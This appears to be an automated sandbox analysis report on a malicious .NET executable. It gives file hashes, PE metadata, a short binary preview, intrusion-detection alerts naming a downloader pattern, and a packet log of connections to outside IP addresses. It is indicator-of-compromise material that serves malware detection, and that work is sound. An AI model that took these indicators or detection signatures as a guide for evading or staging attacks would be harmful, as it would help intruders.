                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):555520
                                                                      Entropy (8bit):7.336606448393891
                                                                      Encrypted:false
                                                                      SSDEEP:12288:YiU+RfWk1oPD4MAQXOHx7S+r0c4rOQe9HDv24RPlA24:Yi3fW3D4v3c+r0clRjvDf
                                                                      MD5:857FC5F1DA7948839D47ABE238392EA2
                                                                      SHA1:8CC415A58DAE52F82BEFC0DAFD947D519A4B1574
                                                                      SHA-256:D53A9888B375983C277DC4471F3F37E258CCA57A1E242784C4130B928127C254
                                                                      SHA-512:7AA0F11C047F5C2401B048162F5596B656872FE9BC9A20B3B674855A8EA5C31C571F196614A9C0E246394B4EA45796A82D1CBCEFBE13FBEE4945ABC348D01A9A
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                                      • Antivirus: Virustotal, Detection: 61%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$+................0..p.............. ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B........................H.......$...l.......6...Hf..."..........................................J.o...JZ..v.7.g.....u.".(A....*.(/........*&.(A.....*".......*".(J....*Vs1...(K...t.........*j.(^.....(_....s3...(`....*>. 4......(a...*2......ob...*:........oc...*&...of...*..(g...*&...{....*&...{....*..(A....sA...}.....(h...}.....si...}......sj...}....*:.{....(h.....*R.(@...-.r...psk...z*N....C...sl...(D...*&...(E...*..(A...*...{....{....{....o....}.....{....{....or...&*6.{....o.....*v.(......%-.&r...
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.336606448393891
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:upXUt2jZ0S.exe
                                                                      File size:555'520 bytes
                                                                      MD5:857fc5f1da7948839d47abe238392ea2
                                                                      SHA1:8cc415a58dae52f82befc0dafd947d519a4b1574
                                                                      SHA256:d53a9888b375983c277dc4471f3f37e258cca57a1e242784c4130b928127c254
                                                                      SHA512:7aa0f11c047f5c2401b048162f5596b656872fe9bc9a20b3b674855a8ea5c31c571f196614a9c0e246394b4ea45796a82d1cbcefbe13fbee4945abc348d01a9a
                                                                      SSDEEP:12288:YiU+RfWk1oPD4MAQXOHx7S+r0c4rOQe9HDv24RPlA24:Yi3fW3D4v3c+r0clRjvDf
                                                                      TLSH:78C4CF2527BA8347D6AF5339F034525087B5A302F59AEFCC8C8468EF1D277499B093A3
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$+................0..p............... ........@.. ....................................@................................
                                                                      Icon Hash:00928e8e8686b000
                                                                      Entrypoint:0x488fde
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x81AF2B24 [Sun Dec 12 04:25:08 2038 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x88f900x4b.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x596.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x86fe40x870006222d962b822e67150285e528677419bFalse0.6019259982638889data7.347382019818626IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x8a0000x5960x600bb337337fd525b603631f27b8432eb2eFalse0.41015625data4.03984594780929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x8c0000xc0x200fd9f3ab53802688c8f3cda00e0951595False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_VERSION0x8a0a00x30cdata0.4230769230769231
                                                                      RT_MANIFEST0x8a3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2025-01-10T21:55:49.925091+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949738132.226.247.7380TCP
                                                                      2025-01-10T21:55:54.012223+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949738132.226.247.7380TCP
                                                                      2025-01-10T21:55:54.378282+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949738132.226.247.7380TCP
                                                                      2025-01-10T21:55:54.942841+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949794104.21.48.1443TCP
                                                                      2025-01-10T21:55:56.675118+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949799132.226.247.7380TCP
                                                                      2025-01-10T21:55:59.613581+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949826104.21.48.1443TCP
                                                                      2025-01-10T21:56:00.946154+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949836104.21.48.1443TCP
                                                                      2025-01-10T21:56:02.283538+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949845104.21.48.1443TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 10, 2025 21:55:46.954423904 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:46.959229946 CET8049738132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:46.959305048 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:46.959542990 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:46.964276075 CET8049738132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:47.631844997 CET8049738132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:47.661509037 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:47.666363955 CET8049738132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:49.870723009 CET8049738132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:49.925091028 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:49.949619055 CET49761443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:49.949656010 CET44349761104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:49.949709892 CET49761443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:49.985052109 CET49761443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:49.985089064 CET44349761104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:50.455708981 CET44349761104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:50.455796957 CET49761443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:50.476711035 CET49761443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:50.476732969 CET44349761104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:50.477859974 CET44349761104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:50.518879890 CET49761443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:50.578707933 CET49761443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:50.619333029 CET44349761104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:50.696280003 CET44349761104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:50.696432114 CET44349761104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:50.696640968 CET49761443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:50.742134094 CET49761443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:50.745974064 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:50.750962973 CET8049738132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:53.953176975 CET8049738132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:54.012223005 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:54.120001078 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:54.124814034 CET8049738132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:54.335509062 CET8049738132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:54.338560104 CET49794443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:54.338609934 CET44349794104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:54.338716984 CET49794443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:54.339406013 CET49794443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:54.339420080 CET44349794104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:54.378282070 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:54.805670023 CET44349794104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:54.808099985 CET49794443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:54.808119059 CET44349794104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:54.942852020 CET44349794104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:54.942933083 CET44349794104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:54.942985058 CET49794443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:54.943697929 CET49794443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:54.947891951 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:54.949273109 CET4979980192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:54.954020977 CET8049738132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:54.954087019 CET4973880192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:54.955188036 CET8049799132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:54.955297947 CET4979980192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:54.955499887 CET4979980192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:54.961466074 CET8049799132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:56.625652075 CET8049799132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:56.627113104 CET49807443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:56.627156973 CET44349807104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:56.627383947 CET49807443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:56.627703905 CET49807443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:56.627717972 CET44349807104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:56.675117970 CET4979980192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:57.110718966 CET44349807104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:57.112909079 CET49807443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:57.112927914 CET44349807104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:57.260442019 CET44349807104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:57.260535002 CET44349807104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:57.260598898 CET49807443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:57.261157036 CET49807443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:57.266896963 CET4981380192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:57.271708012 CET8049813132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:57.271786928 CET4981380192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:57.271898031 CET4981380192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:57.276669979 CET8049813132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:58.978566885 CET8049813132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:58.983273983 CET49826443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:58.983305931 CET44349826104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:58.983387947 CET49826443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:58.983870029 CET49826443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:58.983884096 CET44349826104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:59.018868923 CET4981380192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:59.458817959 CET44349826104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:59.460772991 CET49826443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:59.460799932 CET44349826104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:59.613583088 CET44349826104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:59.614593983 CET44349826104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:55:59.614666939 CET49826443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:59.615051985 CET49826443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:55:59.620258093 CET4981380192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:59.621423006 CET4983180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:59.625282049 CET8049813132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:59.625354052 CET4981380192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:59.626277924 CET8049831132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:55:59.626348972 CET4983180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:59.626461029 CET4983180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:55:59.631350994 CET8049831132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:00.336684942 CET8049831132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:00.340322971 CET49836443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:00.340364933 CET44349836104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:00.341914892 CET49836443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:00.342192888 CET49836443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:00.342202902 CET44349836104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:00.378251076 CET4983180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:00.796771049 CET44349836104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:00.805547953 CET49836443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:00.805572033 CET44349836104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:00.946230888 CET44349836104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:00.946310043 CET44349836104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:00.946544886 CET49836443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:00.946922064 CET49836443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:00.950635910 CET4983180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:00.952183008 CET4984280192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:00.955586910 CET8049831132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:00.955660105 CET4983180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:00.956984997 CET8049842132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:00.957072020 CET4984280192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:00.957765102 CET4984280192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:00.962605953 CET8049842132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:01.651186943 CET8049842132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:01.664659023 CET49845443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:01.664716005 CET44349845104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:01.664810896 CET49845443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:01.665585041 CET49845443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:01.665606022 CET44349845104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:01.706423998 CET4984280192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:02.155219078 CET44349845104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:02.157443047 CET49845443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:02.157476902 CET44349845104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:02.283499956 CET44349845104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:02.283584118 CET44349845104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:02.283631086 CET49845443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:02.284435987 CET49845443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:02.289467096 CET4984280192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:02.290891886 CET4985180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:02.294516087 CET8049842132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:02.294573069 CET4984280192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:02.295707941 CET8049851132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:02.295799971 CET4985180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:02.296025038 CET4985180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:02.300846100 CET8049851132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:02.974539042 CET8049851132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:02.975843906 CET49857443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:02.975893974 CET44349857104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:02.976351976 CET49857443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:02.976579905 CET49857443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:02.976598024 CET44349857104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:03.018909931 CET4985180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:03.441584110 CET44349857104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:03.450165987 CET49857443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:03.450208902 CET44349857104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:03.579442024 CET44349857104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:03.579499006 CET44349857104.21.48.1192.168.2.9
                                                                      Jan 10, 2025 21:56:03.579606056 CET49857443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:03.580426931 CET49857443192.168.2.9104.21.48.1
                                                                      Jan 10, 2025 21:56:03.873068094 CET4986380192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:03.877866030 CET8049863132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:03.878022909 CET4986380192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:03.916841030 CET4986380192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:03.921643019 CET8049863132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:03.975198030 CET4979980192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:03.975894928 CET4985180192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:07.623919964 CET8049863132.226.247.73192.168.2.9
                                                                      Jan 10, 2025 21:56:07.753262043 CET4986380192.168.2.9132.226.247.73
                                                                      Jan 10, 2025 21:56:13.963978052 CET6078453192.168.2.9162.159.36.2
                                                                      Jan 10, 2025 21:56:13.968776941 CET5360784162.159.36.2192.168.2.9
                                                                      Jan 10, 2025 21:56:13.968848944 CET6078453192.168.2.9162.159.36.2
                                                                      Jan 10, 2025 21:56:13.974960089 CET5360784162.159.36.2192.168.2.9
